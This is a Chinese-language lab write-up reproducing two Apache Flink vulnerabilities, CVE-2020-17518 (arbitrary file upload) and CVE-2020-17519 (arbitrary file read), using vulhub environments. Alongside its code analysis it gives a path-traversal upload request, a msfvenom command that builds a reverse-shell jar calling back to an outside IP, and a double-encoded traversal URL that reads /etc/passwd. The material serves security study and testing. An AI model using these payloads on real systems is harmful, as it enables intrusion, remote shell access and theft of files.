文章目录
Apache Flink 任意文件上传漏洞 (CVE-2020-17518)
0x00 漏洞描述
Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。
Apache Flink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。
0x01 影响版本
Apache Flink:1.11.2-1.5.1
0x02 靶场环境
Apache Flink jobmanager 1.11.2:https://vulhub.org/#/environments/flink/CVE-2020-17518/
0x03 漏洞分析
触发点在 org.apache.flink.runtime.rest.FileUploadHandler#channelRead0
,上传时先获取filename
,之后resolve()
解析方法接收filename
(用户可控),与系统路径拼接,dest
存储拼接后上传路径,传给fileUpload.renameTo()
方法,上传文件,并重命名保存至另一个路径以做缓存,这个路径用户也可控,缓存文件存在时间很短,只有30s,此时系统按目标路径写入文件。
新版本修复也是将org.apache.flink.runtime.rest.FileUploadHandler#channelRead0()
对传入的filename
进行截断,只取末尾的文件名,传递的../
和目录名均被忽略
漏洞分析:https://paper.seebug.org/1505/
0x04 漏洞复现
Apache Flink 启动后,访问http://your-ip:8081
查看主页:
构造poc请求包如下:
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
进入容器中查看,文件已经创建成功:
0x05 反弹shell
由于 flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell。
生成 jar 格式的马:
msfvenom -p java/shell_reverse_tcp lhost=10.11.34.231 lport=12581 -f jar > 1,jar
msf 设置监听:
将 jar 包上传后点击上传的包然后点击 Submit 执行:
获得反弹 shell:
Apache Flink 任意文件读取漏洞 (CVE-2020-17519)
0x00 漏洞描述
Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。
0x01 影响版本
Apache Flink:1.11.0, 1.11.1, 1.11.2
0x02 靶场环境
Apache Flink jobmanager 1.11.2:https://vulhub.org/#/environments/flink/CVE-2020-17519/
0x03 漏洞分析
任意读过程中的进行了两次 url 解码,第一次解码产生了path
,pathParams
存放再次解码的结果 ,将HandlerRequest
传递给org.apache.flink.runtime.rest.handler.cluster.JobManagerCustomLogHandler#getFile
,获取pathParams
中存放的filename
,拼接logDir
返回路径。
补丁也是通过File.getName()只取默认文件名,路径中的…/和目录名都被忽略,filename只剩下了文件名
漏洞分析:https://paper.seebug.org/1505/
0x04 漏洞复现
访问:
http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd